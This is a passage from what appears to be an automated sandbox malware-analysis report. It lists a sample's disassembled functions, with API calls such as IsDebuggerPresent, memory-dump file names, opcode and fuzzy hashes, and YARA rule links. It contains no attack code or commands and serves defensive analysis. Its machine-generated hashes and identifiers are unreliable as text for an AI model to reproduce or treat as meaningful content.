                  • Opcode Fuzzy Hash: 1c5643018d37112e7d91b0104b51129c14cea8c917f159d713fcdf35fae6566a
                  • Instruction Fuzzy Hash: 3132A5719146849FDF14DF34CC86AEA37A5AF15320F04457EFD8ACB282DB78A948DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: 528bf46a4451b3105f2f4b9a691d238e73bf9063d1cef72e0e6e866d61e309f7
                  • Instruction ID: f74930e7730bbad1c356ee68bc918b75abea16ed0365c9fa95dd43ee8c6abfcb
                  • Opcode Fuzzy Hash: 528bf46a4451b3105f2f4b9a691d238e73bf9063d1cef72e0e6e866d61e309f7
                  • Instruction Fuzzy Hash: 63C25C72E096288FDB38CE28DD407E9B7B5EB44316F1541EAD90DE7240E774AE899F40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F327E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F327F1
                  • _strlen.LIBCMT ref: 00F32D7F
                    • Part of subcall function 00F4137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F3B652,00000000,?,?,?,00010428), ref: 00F41396
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F32EE0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                  • String ID: CMT
                  • API String ID: 1706572503-2756464174
                  • Opcode ID: 326c5728111df8b2561a24e315796ff16884c2f9c29b9ea198159b1a9c75a7d1
                  • Instruction ID: abb246a20d8eff23a99af6413f81d1403b41bb17d286e83db99d1e47d13cd729
                  • Opcode Fuzzy Hash: 326c5728111df8b2561a24e315796ff16884c2f9c29b9ea198159b1a9c75a7d1
                  • Instruction Fuzzy Hash: 2362F6729002448FDF19DF34C8857EA3BE1EF54324F08457EED9A9B282DB74A945EB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F58767
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F58771
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F5877E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 33afcee1f80412c4f809a83e42bddea0efc21cca5307254385b70c701ea48ceb
                  • Instruction ID: d343e6a623d897884dcf04d6c1c5915d67806f5f9060af816f79b8f63cfaefb9
                  • Opcode Fuzzy Hash: 33afcee1f80412c4f809a83e42bddea0efc21cca5307254385b70c701ea48ceb
                  • Instruction Fuzzy Hash: 8931C275D0122D9BCB21DF68DC88B9CBBB8AF09310F5041EAE91CA7250EB749B859F45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: e1523e59ab420ffd64c9513577b92bc013f5d8a39630f6ee7c024123893d968c
                  • Instruction ID: 61c6aab2b9fba32d17b2d4ac263e6f14ef003089e1c6dd09beb90b0d6654069a
                  • Opcode Fuzzy Hash: e1523e59ab420ffd64c9513577b92bc013f5d8a39630f6ee7c024123893d968c
                  • Instruction Fuzzy Hash: 81310771900109AFDB249E78CC84EFB7BBDDB85325F040298FA18D7251E6349D59DB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction ID: 92b2afc1d013d47bfbf862ccf9a59ed811c564f08808eba7daaf58755a3746c5
                  • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction Fuzzy Hash: 3D022D72E002199FDF14CFA9C8806ADBBF1FF88325F254169D91AE7384D731A945DB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                  Download Yara Rule
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F4A662
                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,00F6E600,?,?), ref: 00F4A6B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FormatInfoLocaleNumber
                  • String ID:
                  • API String ID: 2169056816-0
                  • Opcode ID: 61f7c2b9f0a5d20d2046f80f125b2a4f6a1c841b33701b734900e201876dd169
                  • Instruction ID: c897812599080a9e29c4efcf8591056c5e86fc565acfa56fb6c369f2c3b34638
                  • Opcode Fuzzy Hash: 61f7c2b9f0a5d20d2046f80f125b2a4f6a1c841b33701b734900e201876dd169
                  • Instruction Fuzzy Hash: BE015E76A1020CBBDB109F65EC05FEB77BCEF1A710F004422FA1497151E3B19A24E7A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F36EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(00F4117C,?,00000200), ref: 00F36EC9
                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00F36EEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: 6678533beb3f9c46c5198f9d1912f1340c4d5b5817070805b2a6e0c02f5dbd68
                  • Instruction ID: 001341f14ed4735021ddf3f6ca7e9b262a7daf4c454d93a8ec724a701408f837
                  • Opcode Fuzzy Hash: 6678533beb3f9c46c5198f9d1912f1340c4d5b5817070805b2a6e0c02f5dbd68
                  • Instruction Fuzzy Hash: 12D0C7353C8306BFEA110A74CC05F277B546755B56F10C514F366DD0D0C6B0905CB619
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F61194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F6118F,?,?,00000008,?,?,00F60E2F,00000000), ref: 00F613C1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: 6353911a1c4853cc017d4339bed7a13059fdae7b4cde7ebdc80cec1177bad959
                  • Instruction ID: 0052a1dae328fd58ccd9203a3a4aaa1a804e2373652c8db3e60eb1e756c5d520
                  • Opcode Fuzzy Hash: 6353911a1c4853cc017d4339bed7a13059fdae7b4cde7ebdc80cec1177bad959
                  • Instruction Fuzzy Hash: 19B16C32A10608DFD719CF28C48AB657BE0FF45364F298658E9DACF2A1C735E981DB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID: gj
                  • API String ID: 0-4203073231
                  • Opcode ID: 01150953abb97d559ce3ff5450a06de1d34f5234cbbadb1069659e2467eafaa8
                  • Instruction ID: cd89c44972d8f3892aca4ae284a60e98a27c7b7595ce7d49c56d388dd0aeffa7
                  • Opcode Fuzzy Hash: 01150953abb97d559ce3ff5450a06de1d34f5234cbbadb1069659e2467eafaa8
                  • Instruction Fuzzy Hash: 94F1C3B1A083418FC748CF29D880A1AFBE1BFCC208F15892EF598D7711E634E9558B56
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                  Download Yara Rule
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 00F3AD1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: 4d9ae8e1f6cab94c9e731925fa29d648c7d0c3d0edf9e18b538071cd0a68fa02
                  • Instruction ID: 77cddd55ccdf2ed6e6e73c41e19858bc526126b1475fb18e3ea766a4a7eac17d
                  • Opcode Fuzzy Hash: 4d9ae8e1f6cab94c9e731925fa29d648c7d0c3d0edf9e18b538071cd0a68fa02
                  • Instruction Fuzzy Hash: 64F090B5D0020CCFCB28DF18ED416E977B6FB48321F200295E91883364DBB0AD80EE52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00F4EAC5), ref: 00F4F068
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 616c9fc579781dea513cf9402afe2e6e1c16d01c11fdd1fa06514aa01b3d2bc9
                  • Instruction ID: 79bf65363c37ff7a53b279e0474bf33bf0468761ce9d0d214c18bf0732222aae
                  • Opcode Fuzzy Hash: 616c9fc579781dea513cf9402afe2e6e1c16d01c11fdd1fa06514aa01b3d2bc9
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: HeapProcess
                  • String ID:
                  • API String ID: 54951025-0
                  • Opcode ID: 63335c9835cd6e35f55e9c35473c2bf5cdb815b4d5d53d683c5c784fc9779f7e
                  • Instruction ID: 88930f448cbe685d2cbe91ee617bbd08e0914def46599a61da31ce1f82ac17f4
                  • Opcode Fuzzy Hash: 63335c9835cd6e35f55e9c35473c2bf5cdb815b4d5d53d683c5c784fc9779f7e
                  • Instruction Fuzzy Hash: CDA001B4A0120A8B97418F76AA0920A3AA9BA46695709826AA529C61A5EA648560AF01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F45C77 Relevance: .8, Instructions: 800COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                  • Instruction ID: 1aae584e95d844749749ecbb14cbb0ca2f245b52cbd783092250698f7de25a32
                  • Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
                  • Instruction Fuzzy Hash: 4A622931A04B859FCB29DF38C8906B9BFE1AF56304F08856DDCDA8B346D634E945EB11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F470BF Relevance: .8, Instructions: 773COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                  • Instruction ID: 39c8bdb0dfa15ebf4f7530db1b5082121405b4972307edea8ed4fff64e132828
                  • Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
                  • Instruction Fuzzy Hash: 8E62227160878A9FC719DF28C8806B9FFE1BB45304F14866EDCA68B742D734E955EB80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3ED14 Relevance: .7, Instructions: 694COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                  • Instruction ID: ad5613f2357287ba26ef80a67e24489e87ade754c99cc00f6f7e925a62f1e38e
                  • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                  • Instruction Fuzzy Hash: AC524B72A087018FC718CF19C891A6AF7E1FFCC314F498A2DE98597255D734EA19CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F46A7B Relevance: .5, Instructions: 509COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c90c3e9a17d57a016fb56c9e3ce0de1fcf648525ef949cacb5626c39e9bab143
                  • Instruction ID: 7528211ef173b09ce07baafb4b09abe54fa258cc4f544bde8e94f31f20428cf0
                  • Opcode Fuzzy Hash: c90c3e9a17d57a016fb56c9e3ce0de1fcf648525ef949cacb5626c39e9bab143
                  • Instruction Fuzzy Hash: 9A12D4B16047068BC728DF28C8D0779BBE0FB55314F10892EE997C7A81D778A895EB46
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F3BE13 Relevance: .4, Instructions: 449COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0b76c7b026f117a4ac341fbbcd343446d1d733ac3cb46c7384dbc9a15bbc8d70
                  • Instruction ID: 46846b3fbc751d93ee5a44988a562bd481259a4149b2cb3fbe0e42e2a3b8b7f8
                  • Opcode Fuzzy Hash: 0b76c7b026f117a4ac341fbbcd343446d1d733ac3cb46c7384dbc9a15bbc8d70
                  • Instruction Fuzzy Hash: 5EF1BE72A083418FC718CF29C48496EBBE1EFC9724F148A2EF5D5E7251D730E945AB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F50B43 Relevance: .3, Instructions: 345COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
